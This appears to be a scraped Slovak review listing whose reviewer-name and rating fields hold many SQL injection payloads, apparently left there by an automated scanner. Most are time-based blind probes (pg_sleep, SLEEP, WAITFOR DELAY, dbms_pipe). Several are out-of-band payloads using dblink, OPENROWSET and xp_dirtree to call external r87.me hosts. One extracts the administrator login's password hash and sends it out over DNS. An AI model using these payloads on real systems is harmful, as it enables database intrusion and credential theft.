 1109. SELECT pg_sleep(25)-- /* afa29bff-9c82-4107-8581-95ee3fe5f7aa */
  Recenzované dňa

  3

 1110. Smith
  Recenzované dňa

  SELECT dblink_connect('host=to0y-xlqg2r4qvg7cynehtn8rcflpdqglgeh_gwd'||'rly.r87.me user=a password=a connect_timeout=2')

 1111. SELECT pg_sleep(25)-- /* 5877b105-d35f-4cef-aaa5-9e22fc943399 */
  Recenzované dňa

  3

 1112. Smith
  Recenzované dňa

  -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','to0y-xlqg2udkhpqtsn9szvb-j_2gfn3sbhmr1d3'+'vls.r87.me')exec sp_executesql @r--

 1113. Smith;SELECT pg_sleep(25)-- /* f13d1241-fb85-4705-b184-42284a49aa27 */
  Recenzované dňa

  3

 1114. Smith;SELECT pg_sleep(25)-- /* 47b3c8c4-9d6b-415d-bd57-d41a0f6be259 */
  Recenzované dňa

  3

 1115. Smith
  Recenzované dňa

  3

 1116. Smith';SELECT pg_sleep(25)-- /* 65b3822f-9878-41c8-a2af-5ec4d5588b29 */
  Recenzované dňa

  3

 1117. Smith
  Recenzované dňa

  3

 1118. Smith';SELECT pg_sleep(25)-- /* 544ab850-221e-4c2b-8fee-49225bc83d6a */
  Recenzované dňa

  3

 1119. Smith
  Recenzované dňa

  3

 1120. 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 /* d71107fb-a5e2-4fe7-9e7b-8468e588c119 */
  Recenzované dňa

  3

 1121. Smith
  Recenzované dňa

  3

 1122. 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' /* bd7cc2cc-55f3-4c7c-9ca2-322da79c30c3 */
  Recenzované dňa

  3

 1123. Smith
  Recenzované dňa

  3

 1124. (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) /* e9c542e0-7293-4962-af21-fccf6e2e587b */
  Recenzované dňa

  3

 1125. Smith
  Recenzované dňa

  3

 1126. Smith
  Recenzované dňa

  3

 1127. ((select sleep(25)))a-- 1 /* 0740ed61-c11e-4f4a-9b04-7446e2202c4a */
  Recenzované dňa

  3

 1128. ((select sleep(25)))a-- 1 /* 9552ccb2-7546-47ea-ab04-bec280ad6ddb */
  Recenzované dňa

  3

 1129. Smith
  Recenzované dňa

  3

 1130. Smith
  Recenzované dňa

  3

 1131. -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 2ff499e4-298e-42aa-acbc-7aa97a8fe65b */
  Recenzované dňa

  3

 1132. Smith
  Recenzované dňa

  3

 1133. -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 09628d47-2609-4683-b7a1-1526c1729268 */
  Recenzované dňa

  3

 1134. Smith
  Recenzované dňa

  3

 1135. Smith + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ /* db059546-9dbc-4e88-905f-e36c74960e10 */
  Recenzované dňa

  3

 1136. Smith
  Recenzované dňa

  3

 1137. syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 88fbb178-0ae7-4a06-a06e-15133ac3846d */
  Recenzované dňa

  3

 1138. Smith
  Recenzované dňa

  3

 1139. 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 126b146a-9cb0-4844-b3ec-a07b6e1b045e */
  Recenzované dňa

  3

 1140. Smith
  Recenzované dňa

  3

 1141. 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 73e4571a-5044-434a-8e2f-88b76f174241 */
  Recenzované dňa

  3

 1142. Smith
  Recenzované dňa

  3

 1143. 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 54043985-5169-49b0-a6e7-94e0e7aacf4b */
  Recenzované dňa

  3

 1144. Smith
  Recenzované dňa

  3

 1145. 1)) WAITFOR DELAY '0:0:25'-- /* 423f016f-be26-44f5-8fde-2edc5b1c0e80 */
  Recenzované dňa

  3

 1146. Smith
  Recenzované dňa

  3

 1147. 1)) WAITFOR DELAY '0:0:25'-- /* 89f8d532-4d8f-49de-9e98-489351aa1939 */
  Recenzované dňa

  3

 1148. Smith
  Recenzované dňa

  3

 1149. ')) WAITFOR DELAY '0:0:25'-- /* ab8af642-177b-4149-8ac2-dbb4effa39d9 */
  Recenzované dňa

  3

 1150. ')) WAITFOR DELAY '0:0:25'-- /* 0f95d15c-1d35-4e37-af0d-43c101923af8 */
  Recenzované dňa

  3

 1151. ') WAITFOR DELAY '0:0:25'-- /* 41a3ba45-0d91-4bd7-918e-1ee2210c2ac8 */
  Recenzované dňa

  3

 1152. ') WAITFOR DELAY '0:0:25'-- /* f1d6aa58-ed2a-45c9-b3c6-85a69d98b621 */
  Recenzované dňa

  3

 1153. 1) WAITFOR DELAY '0:0:25'-- /* ade2c62e-2e1a-48ba-bf2f-696df76d1d4a */
  Recenzované dňa

  3

 1154. 1) WAITFOR DELAY '0:0:25'-- /* 752a6346-e6e6-4ecd-b99c-29d0fb5d9837 */
  Recenzované dňa

  3

 1155. WAITFOR DELAY '0:0:25'-- /* 54798cf6-24e8-4303-a37d-01afcf357acc */
  Recenzované dňa

  3

 1156. WAITFOR DELAY '0:0:25'-- /* 04bf9b03-a00f-4975-8bbd-0471fd4c1695 */
  Recenzované dňa

  3

 1157. 1 WAITFOR DELAY '0:0:25'-- /* 84ac20f2-15ba-43a2-bc36-7a65203d6d0a */
  Recenzované dňa

  3

 1158. 1 WAITFOR DELAY '0:0:25'-- /* 07f437b5-4dae-4004-a6f4-de8c7ba4f003 */
  Recenzované dňa

  3

 1159. ' WAITFOR DELAY '0:0:25'-- /* 8e39b321-9043-4ce2-9ea8-32e4062c7f88 */
  Recenzované dňa

  3

 1160. ' WAITFOR DELAY '0:0:25'-- /* efc88c86-3920-4f70-a3a2-b6f19be36787 */
  Recenzované dňa

  3

 1161. Smith
  Recenzované dňa

  3

 1162. Smith
  Recenzované dňa

  3

 1163. Smith
  Recenzované dňa

  3

 1164. Smith
  Recenzované dňa

  3

 1165. Smith
  Recenzované dňa

  3

 1166. Smith
  Recenzované dňa

  3

 1167. Smith
  Recenzované dňa

  3

 1168. Smith
  Recenzované dňa

  3

 1169. Smith
  Recenzované dňa

  3

 1170. Smith
  Recenzované dňa

  3

 1171. Smith
  Recenzované dňa

  3

 1172. Smith
  Recenzované dňa

  3

 1173. Smith
  Recenzované dňa

  1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','to0y-xlqg2vqlmtshhnvcpzfpwbnft4duly009v-'+'hvc.r87.me')exec sp_executesql @r--

 1174. Smith
  Recenzované dňa

  3

 1175. Smith
  Recenzované dňa

  3

 1176. Smith
  Recenzované dňa

  3

 1177. Smith
  Recenzované dňa

  3

 1178. Smith
  Recenzované dňa

  3

 1179. Smith
  Recenzované dňa

  3

 1180. Smith
  Recenzované dňa

  3

 1181. Smith
  Recenzované dňa

  3

 1182. Smith
  Recenzované dňa

  3

 1183. Smith
  Recenzované dňa

  3

 1184. Smith
  Recenzované dňa

  3

 1185. Smith
  Recenzované dňa

  3

 1186. Smith
  Recenzované dňa

  3

 1187. Smith
  Recenzované dňa

  3

 1188. Smith
  Recenzované dňa

  3

 1189. Smith
  Recenzované dňa

  3

 1190. Smith
  Recenzované dňa

  3

 1191. Smith
  Recenzované dňa

  3

 1192. Smith
  Recenzované dňa

  3

 1193. Smith
  Recenzované dňa

  3

 1194. Smith
  Recenzované dňa

  3

 1195. Smith
  Recenzované dňa

  3

 1196. Smith
  Recenzované dňa

  3

 1197. Smith
  Recenzované dňa

  3

 1198. Smith
  Recenzované dňa

  3

 1199. Smith
  Recenzované dňa

  3

 1200. Smith
  Recenzované dňa

  3

 1201. Smith
  Recenzované dňa

  3

 1202. Smith
  Recenzované dňa

  3

 1203. Smith
  Recenzované dňa

  3

 1204. Smith
  Recenzované dňa

  3

 1205. Smith
  Recenzované dňa

  3

 1206. Smith
  Recenzované dňa

  3

 1207. Smith
  Recenzované dňa

  3

 1208. Smith
  Recenzované dňa

  3

 1209. Smith
  Recenzované dňa

  3

 1210. Smith
  Recenzované dňa

  3

 1211. Smith
  Recenzované dňa

  3

 1212. Smith
  Recenzované dňa

  3

 1213. Smith
  Recenzované dňa

  3

 1214. Smith
  Recenzované dňa

  3

 1215. Smith
  Recenzované dňa

  3

 1216. Smith
  Recenzované dňa

  3

 1217. Smith
  Recenzované dňa

  3

 1218. Smith
  Recenzované dňa

  3

 1219. Smith
  Recenzované dňa

  3

 1220. Smith
  Recenzované dňa

  3

 1221. Smith
  Recenzované dňa

  3

 1222. Smith
  Recenzované dňa

  3

 1223. Smith
  Recenzované dňa

  3

 1224. Smith
  Recenzované dňa

  3

 1225. Smith
  Recenzované dňa

  3

 1226. Smith
  Recenzované dňa

  3

 1227. Smith
  Recenzované dňa

  3

 1228. Smith
  Recenzované dňa

  3

 1229. Smith
  Recenzované dňa

  3

 1230. Smith
  Recenzované dňa

  3

 1231. Smith
  Recenzované dňa

  3

 1232. Smith
  Recenzované dňa

  3

 1233. Smith
  Recenzované dňa

  3

 1234. Smith
  Recenzované dňa

  3

 1235. Smith
  Recenzované dňa

  3

 1236. Smith
  Recenzované dňa

  3

 1237. Smith
  Recenzované dňa

  3

 1238. Smith
  Recenzované dňa

  3

 1239. Smith
  Recenzované dňa

  3

 1240. Smith
  Recenzované dňa

  3

 1241. Smith
  Recenzované dňa

  3

 1242. Smith
  Recenzované dňa

  3

 1243. Smith
  Recenzované dňa

  3

 1244. Smith
  Recenzované dňa

  3

 1245. Smith
  Recenzované dňa

  3

 1246. Smith
  Recenzované dňa

  3

 1247. Smith
  Recenzované dňa

  3

 1248. Smith
  Recenzované dňa

  3

 1249. Smith
  Recenzované dňa

  3

 1250. Smith
  Recenzované dňa

  3

 1251. Smith
  Recenzované dňa

  3

 1252. Smith
  Recenzované dňa

  3

 1253. Smith
  Recenzované dňa

  3

 1254. Smith
  Recenzované dňa

  3

 1255. Smith
  Recenzované dňa

  DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','to0y-xlqg2xnnv7flungisym9upgbkqj5f7jv7n2'+'5fc.r87.me')exec sp_executesql @r

 1256. Smith
  Recenzované dňa

  3

 1257. Smith
  Recenzované dňa

  3

 1258. Smith
  Recenzované dňa

  3

 1259. Smith
  Recenzované dňa

  3

 1260. Smith
  Recenzované dňa

  3

 1261. Smith
  Recenzované dňa

  syscolumns WHERE 2>3;exec('xp_dirtree ''\\to0y-xlqg2xwxmvd6uqgiawypzr8exxmcf9fj3xg'+'wae.r87.me'+'\c$\a''')--

 1262. Smith
  Recenzované dňa

  3

 1263. Smith
  Recenzované dňa

  3

 1264. Smith
  Recenzované dňa

  3

 1265. Smith
  Recenzované dňa

  3

 1266. Smith
  Recenzované dňa

  3

 1267. Smith
  Recenzované dňa

  3

 1268. Smith
  Recenzované dňa

  3

 1269. Smith
  Recenzované dňa

  3

 1270. Smith
  Recenzované dňa

  3

 1271. Smith
  Recenzované dňa

  1'))exec('xp_dirtree ''\\to0y-xlqg28pbzqdh73bfxs1_xk0msqg3xppvkli'+'dc4.r87.me'+'\c$\a''')--

 1272. Smith
  Recenzované dňa

  1))exec('xp_dirtree ''\\to0y-xlqg2ypb3fod7oyvvusgpatbwc55ofjcwu-'+'jry.r87.me'+'\c$\a''')--

 1273. Smith
  Recenzované dňa

  3

 1274. Smith
  Recenzované dňa

  3

 1275. Smith
  Recenzované dňa

  1')exec('xp_dirtree ''\\to0y-xlqg2xc4t9pp86uspcqvow2udxfzk6hhh3j'+'3m4.r87.me'+'\c$\a''')--

 1276. Smith
  Recenzované dňa

  3

 1277. Smith
  Recenzované dňa

  1) exec('xp_dirtree ''\\to0y-xlqg2fmmdb_zxvxdb04sn9kxxhknfqplvd9'+'tre.r87.me'+'\c$\a''')--

 1278. Smith
  Recenzované dňa

  3

 1279. Smith
  Recenzované dňa

  3

 1280. Smith
  Recenzované dňa

  -1';exec('xp_dirtree ''\\to0y-xlqg2yvct-f3yweyssqpelelktmxg9tgr4d'+'clq.r87.me'+'\c$\a''')--

 1281. Smith
  Recenzované dňa

  1;exec('xp_dirtree ''\\to0y-xlqg2p2csrweeqiikcznqrl72tfpu6p1rvm'+'hrk.r87.me'+'\c$\a''')--

 1282. Smith
  Recenzované dňa

  3

 1283. Smith
  Recenzované dňa

  declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.to0y-xlqg2mqqf8arefzapfbtyz_vnk3f61jlfus'+'c9c.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'[email protected]+'\c$''')

 1284. Smith
  Recenzované dňa

  3

 1285. Smith
  Recenzované dňa

  exec('xp_dirtree ''\\to0y-xlqg2az6fukacncvrjhbboyzceqdqkm0zyr'+'aha.r87.me'+'\c$\a''')

 1286. Smith
  Recenzované dňa

  3

 1287. Smith
  Recenzované dňa

  3

 1288. Smith
  Recenzované dňa

  3

 1289. Smith
  Recenzované dňa

  3

 1290. Smith
  Recenzované dňa

  3

 1291. Smith
  Recenzované dňa

  3

 1292. Smith
  Recenzované dňa

  3

 1293. Smith
  Recenzované dňa

  3

 1294. Smith
  Recenzované dňa

  3

 1295. Smith
  Recenzované dňa

  3

 1296. Smith
  Recenzované dňa

  3

 1297. Smith
  Recenzované dňa

  3

 1298. Smith
  Recenzované dňa

  3

 1299. Smith
  Recenzované dňa

  3

 1300. Smith
  Recenzované dňa

  3

 1301. Smith
  Recenzované dňa

  3

 1302. Smith
  Recenzované dňa

  3

 1303. Smith
  Recenzované dňa

  3

 1304. Smith
  Recenzované dňa

  3

 1305. Smith
  Recenzované dňa

  3

 1306. Smith
  Recenzované dňa

  3

 1307. Smith
  Recenzované dňa

  3

 1308. Smith
  Recenzované dňa

  3

 1309. Smith
  Recenzované dňa

  3

 1310. Smith
  Recenzované dňa

  3

 1311. Smith
  Recenzované dňa

  3

 1312. Smith
  Recenzované dňa

  3

 1313. Smith
  Recenzované dňa

  3

 1314. Smith
  Recenzované dňa

  3

 1315. Smith
  Recenzované dňa

  3

 1316. Smith
  Recenzované dňa

  3

 1317. Smith
  Recenzované dňa

  3

 1318. Smith
  Recenzované dňa

  3

 1319. Smith
  Recenzované dňa

  3

 1320. Smith
  Recenzované dňa

  3

 1321. Smith
  Recenzované dňa

  3

 1322. Smith
  Recenzované dňa

  3

 1323. Smith
  Recenzované dňa

  3

 1324. Smith
  Recenzované dňa

  3

 1325. Smith
  Recenzované dňa

  3

 1326. Smith
  Recenzované dňa

  3

 1327. Smith
  Recenzované dňa

  3

 1328. Smith
  Recenzované dňa

  3

 1329. Smith
  Recenzované dňa

  3

 1330. Smith
  Recenzované dňa

  3

 1331. Smith
  Recenzované dňa

  3

 1332. Smith
  Recenzované dňa

  3

 1333. Smith
  Recenzované dňa

  3

 1334. Smith
  Recenzované dňa

  3

 1335. Smith
  Recenzované dňa

  3

 1336. Smith
  Recenzované dňa

  3

 1337. Smith
  Recenzované dňa

  3

 1338. Smith
  Recenzované dňa

  3

 1339. Smith
  Recenzované dňa

  3

 1340. Smith
  Recenzované dňa

  3

 1341. Smith
  Recenzované dňa

  3

 1342. Smith
  Recenzované dňa

  3

 1343. Smith
  Recenzované dňa

  3

 1344. Smith
  Recenzované dňa

  3

 1345. Smith
  Recenzované dňa

  3

 1346. Smith
  Recenzované dňa

  3

 1347. Smith
  Recenzované dňa

  3

 1348. Smith
  Recenzované dňa

  3

 1349. Smith
  Recenzované dňa

  3

 1350. Smith
  Recenzované dňa

  3

 1351. Smith
  Recenzované dňa

  3

 1352. Smith
  Recenzované dňa

  3

 1353. Smith
  Recenzované dňa

  3

 1354. Smith
  Recenzované dňa

  3

 1355. Smith
  Recenzované dňa

  3

 1356. Smith
  Recenzované dňa

  3

 1357. Smith
  Recenzované dňa

  3

 1358. Smith
  Recenzované dňa

  3

 1359. Smith
  Recenzované dňa

  3

 1360. Smith
  Recenzované dňa

  3

 1361. Smith
  Recenzované dňa

  3

 1362. Smith
  Recenzované dňa

  3

 1363. Smith
  Recenzované dňa

  3

 1364. Smith
  Recenzované dňa

  3

 1365. Smith
  Recenzované dňa

  3

 1366. Smith
  Recenzované dňa

  3

 1367. Smith
  Recenzované dňa

  3

 1368. Smith
  Recenzované dňa

  3

 1369. Smith
  Recenzované dňa

  3

 1370. Smith
  Recenzované dňa

  3

 1371. Smith
  Recenzované dňa

  3

 1372. Smith
  Recenzované dňa

  3

 1373. Smith
  Recenzované dňa

  3

 1374. Smith
  Recenzované dňa

  3

 1375. Smith
  Recenzované dňa

  3

 1376. Smith
  Recenzované dňa

  3

 1377. Smith
  Recenzované dňa

  3

 1378. Smith
  Recenzované dňa

  3

 1379. Smith
  Recenzované dňa

  3

 1380. Smith
  Recenzované dňa

  3

 1381. Smith
  Recenzované dňa

  3

 1382. Smith
  Recenzované dňa

  3

 1383. Smith
  Recenzované dňa

  3

 1384. Smith
  Recenzované dňa

  3

 1385. Smith
  Recenzované dňa

  3

 1386. Smith
  Recenzované dňa

  3

 1387. Smith
  Recenzované dňa

  3

 1388. Smith
  Recenzované dňa

  3

 1389. Smith
  Recenzované dňa

  3

 1390. Smith
  Recenzované dňa

  3

 1391. Smith
  Recenzované dňa

  3

 1392. Smith
  Recenzované dňa

  3

 1393. Smith
  Recenzované dňa

  3

 1394. Smith
  Recenzované dňa

  3

 1395. Smith
  Recenzované dňa

  3

 1396. Smith
  Recenzované dňa

  3

 1397. Smith
  Recenzované dňa

  3

 1398. Smith
  Recenzované dňa

  3

 1399. Smith
  Recenzované dňa

  3

 1400. Smith
  Recenzované dňa

  3

 1401. Smith
  Recenzované dňa

  3

 1402. Smith
  Recenzované dňa

  3

 1403. Smith
  Recenzované dňa

  3

 1404. Smith
  Recenzované dňa

  3

 1405. Smith
  Recenzované dňa

  3

 1406. Smith
  Recenzované dňa

  3

 1407. Smith
  Recenzované dňa

  3

 1408. Smith
  Recenzované dňa

  3

 1409. Smith
  Recenzované dňa

  'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* 06701c53-dad1-4345-b589-3b214ca9bb44 */

 1410. Smith
  Recenzované dňa

  3

 1411. Smith
  Recenzované dňa

  'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* e57c6424-900f-4ff4-b967-f7bd55f734d5 */

 1412. Smith
  Recenzované dňa

  3

 1413. Smith
  Recenzované dňa

  ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 44f85e60-594b-4124-8126-b9f1c0144724 */

 1414. Smith
  Recenzované dňa

  3

 1415. Smith
  Recenzované dňa

  ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* faaaad3a-e426-4441-ba2c-556101fd2010 */

 1416. Smith
  Recenzované dňa

  3

 1417. Smith
  Recenzované dňa

  3

 1418. Smith
  Recenzované dňa

  ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* d8afdad0-6e8f-44ee-b20f-196931bba657 */

 1419. Smith
  Recenzované dňa

  3

 1420. Smith
  Recenzované dňa

  ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 2321e53a-7b1f-4d20-91d8-289c25d5f76f */

 1421. Smith
  Recenzované dňa

  3

 1422. Smith
  Recenzované dňa

  -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* 7d6a3040-9366-4c1b-8e56-3b051599b811 */

 1423. Smith
  Recenzované dňa

  -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* 88e5cc1c-fcfa-4ae4-aa1b-77b2589b0f6c */

 1424. Smith
  Recenzované dňa

  -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* 3f02c902-8488-4063-be98-2f83cc02a065 */

 1425. Smith
  Recenzované dňa

  -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* 8e088b71-ec3f-4381-89a7-e8017d66e71e */

 1426. Smith
  Recenzované dňa

  -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 5b29e0f2-c57f-4b4f-a328-b566445467c9 */

 1427. Smith
  Recenzované dňa

  -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* dd2db74c-3189-47ea-ab57-2deb4323667b */

 1428. Smith
  Recenzované dňa

  '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* e450e48c-044e-4e4c-bd05-dc4c9ca2fd1a */

 1429. Smith
  Recenzované dňa

  '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* c4541012-6bda-4041-8268-42eeac8b2508 */

 1430. Smith
  Recenzované dňa

  ((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* 8d802ba7-7afb-4f9b-b4fb-b4a40a86592b */

 1431. Smith
  Recenzované dňa

  ((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* bd181d4d-3219-483e-bdc1-82ce62f39993 */

 1432. Smith
  Recenzované dňa

  3));SELECT pg_sleep(25)-- /* 74da5ebe-8743-4f92-8e04-c300266d3b83 */

 1433. Smith
  Recenzované dňa

  3));SELECT pg_sleep(25)-- /* 0342abb4-5dae-422f-b17d-e199657468b8 */

 1434. Smith
  Recenzované dňa

  3'));SELECT pg_sleep(25)-- /* 89cf76f1-0593-46e1-a649-24ffd7df5dc7 */

 1435. Smith
  Recenzované dňa

  3'));SELECT pg_sleep(25)-- /* 98dd4c01-876f-492d-8e33-2f1c111a5a2d */

 1436. Smith
  Recenzované dňa

  3');SELECT pg_sleep(25)-- /* 093ab43d-b991-4099-beee-c3cc82b4584c */

 1437. Smith
  Recenzované dňa

  3');SELECT pg_sleep(25)-- /* 1ae5655a-6795-4746-9600-43a8ea6a545a */

 1438. Smith
  Recenzované dňa

  3);SELECT pg_sleep(25)-- /* 5edf12af-a088-473a-a5c7-f37bfdb1b7da */

 1439. Smith
  Recenzované dňa

  3);SELECT pg_sleep(25)-- /* fe6bef0b-4da4-4076-850e-0682570cdede */

 1440. Smith
  Recenzované dňa

  SELECT pg_sleep(25)-- /* d3bdbfc1-6b61-4ff1-8b24-a34c2d35e04b */

 1441. Smith
  Recenzované dňa

  SELECT pg_sleep(25)-- /* f7a1ba96-ba22-4467-82ac-3c12f7af0af7 */

 1442. Smith
  Recenzované dňa

  3;SELECT pg_sleep(25)-- /* 94232f86-1b76-4e9d-8f55-d388b41b631b */

 1443. Smith
  Recenzované dňa

  3;SELECT pg_sleep(25)-- /* e43660af-b37a-44d8-b8e4-1ea0ecc50839 */

 1444. Smith
  Recenzované dňa

  3';SELECT pg_sleep(25)-- /* 5f1f6785-a2ab-4519-a3bd-4d8bbe040628 */

 1445. Smith
  Recenzované dňa

  3';SELECT pg_sleep(25)-- /* f97850db-e2c6-4b50-baa4-cb925434424e */

 1446. Smith
  Recenzované dňa

  1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 /* c08e6dcc-49e2-4a65-a0e5-aee9ff8cd398 */

 1447. Smith
  Recenzované dňa

  1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' /* 3b7ac03d-b868-42c3-84ff-3af1b1df22e9 */

 1448. Smith
  Recenzované dňa

  (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) /* 99c18925-44c4-4654-a799-14430fbd3951 */

 1449. Smith
  Recenzované dňa

  ((select sleep(25)))a-- 1 /* 850e1e2e-8824-494f-a1b5-ceeed016268c */

 1450. Smith
  Recenzované dňa

  ((select sleep(25)))a-- 1 /* 7d395337-3331-447d-92ed-e79203012bb8 */

 1451. Smith
  Recenzované dňa

  -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 1fdf45e0-b3b9-4e9d-99bd-ca1692990e23 */

 1452. Smith
  Recenzované dňa

  -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 4a64a1ea-6029-48dc-942b-cb62bb3c8453 */

 1453. Smith
  Recenzované dňa

  3 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ /* 35c86cb3-1cff-4bca-98f9-5e6e9414d0ce */

 1454. Smith
  Recenzované dňa

  syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 5d755ee5-40b3-486a-94e5-3f97ea623258 */

 1455. Smith
  Recenzované dňa

  1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* bad57256-543c-4325-afe1-6e652bdfe3cb */

 1456. Smith
  Recenzované dňa

  1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* d33052c9-f2fb-4fe4-80e9-be3cb80eb23e */

 1457. Smith
  Recenzované dňa

  1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 87ca2b8a-64ae-4b63-9504-76f6dd35deb4 */

 1458. Smith
  Recenzované dňa

  1)) WAITFOR DELAY '0:0:25'-- /* 7a09fb28-a5cf-45a7-8eae-c44c1b09211e */

 1459. Smith
  Recenzované dňa

  1)) WAITFOR DELAY '0:0:25'-- /* c8f6f782-ecea-4e64-bafd-174495a56527 */

 1460. Smith
  Recenzované dňa

  ')) WAITFOR DELAY '0:0:25'-- /* c844b903-fc3e-4b21-a20c-5865609163fc */

 1461. Smith
  Recenzované dňa

  ')) WAITFOR DELAY '0:0:25'-- /* 444730e0-a81f-4d24-98fd-1126630a7bb5 */

 1462. Smith
  Recenzované dňa

  ') WAITFOR DELAY '0:0:25'-- /* b9073386-9883-4483-82a1-c0ce2757defe */

 1463. Smith
  Recenzované dňa

  ') WAITFOR DELAY '0:0:25'-- /* c0a3f7b8-6b03-4807-8b57-fc747d5c1e53 */

 1464. Smith
  Recenzované dňa

  1) WAITFOR DELAY '0:0:25'-- /* 28f25430-3edf-4c07-af8b-dbbd2c74f27e */

 1465. Smith
  Recenzované dňa

  1) WAITFOR DELAY '0:0:25'-- /* dd2f3256-42fe-41ea-a477-d8749d6a5958 */

 1466. Smith
  Recenzované dňa

  WAITFOR DELAY '0:0:25'-- /* 75bb7d90-7f9c-47c8-b7fa-06197512611e */

 1467. Smith
  Recenzované dňa

  WAITFOR DELAY '0:0:25'-- /* c44bdfc3-80b9-4dcf-9019-d4212f58d5af */

 1468. Smith
  Recenzované dňa

  1 WAITFOR DELAY '0:0:25'-- /* fe717c2c-d237-48d0-b41d-b190509f0b91 */

 1469. Smith
  Recenzované dňa

  1 WAITFOR DELAY '0:0:25'-- /* d44fc391-2dfb-47de-812f-717063dd8046 */

 1470. Smith
  Recenzované dňa

  ' WAITFOR DELAY '0:0:25'-- /* efae6843-2d6a-4e3d-a052-f200cacfb474 */

 1471. Smith
  Recenzované dňa

  ' WAITFOR DELAY '0:0:25'-- /* b9586ad5-dc36-45cd-8d20-53de514df7e8 */

 1472. Smith
  Recenzované dňa

  3

 1473. Smith
  Recenzované dňa

  3

 1474. Smith
  Recenzované dňa

  3

 1475. Smith
  Recenzované dňa

  3

 1476. Smith
  Recenzované dňa

  3

 1477. Smith
  Recenzované dňa

  3

 1478. Smith
  Recenzované dňa

  3

 1479. Smith
  Recenzované dňa

  3

 1480. -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1
  Recenzované dňa

  3

 1481. Smith
  Recenzované dňa

  3

